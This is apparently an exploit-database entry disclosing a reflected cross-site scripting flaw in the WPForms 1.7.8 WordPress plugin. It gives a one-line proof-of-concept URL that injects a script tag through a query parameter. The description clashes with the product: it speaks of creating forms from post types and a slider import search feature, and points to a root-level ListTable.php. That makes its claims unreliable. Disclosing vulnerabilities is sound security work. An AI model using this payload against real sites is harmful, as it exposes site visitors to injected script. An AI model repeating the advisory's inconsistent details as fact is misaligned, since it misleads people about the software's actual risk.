WPForms 1.7.8 - Cross-Site Scripting (XSS)
Author: Milad karimi type: webapps platform: php port: date_added: 2023-03-30 date_updated: 2023-03-30 verified: 0 codes: tags: aliases: screenshot_url: application_url: raw file: 51152.txt
# Exploit Title: WPForms 1.7.8 - Cross-Site Scripting (XSS) # Date: 2022-12-05 # Author: Milad karimi # Software Link: https://wordpress.org/plugins/wpforms-lite # Version: 1.7.8 # Tested on: Windows 10 # CVE: N/A 1. Description: This plugin creates a WPForms from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: https://$target/ListTable.php?foobar=<script>alert("Ex3ptionaL")</script>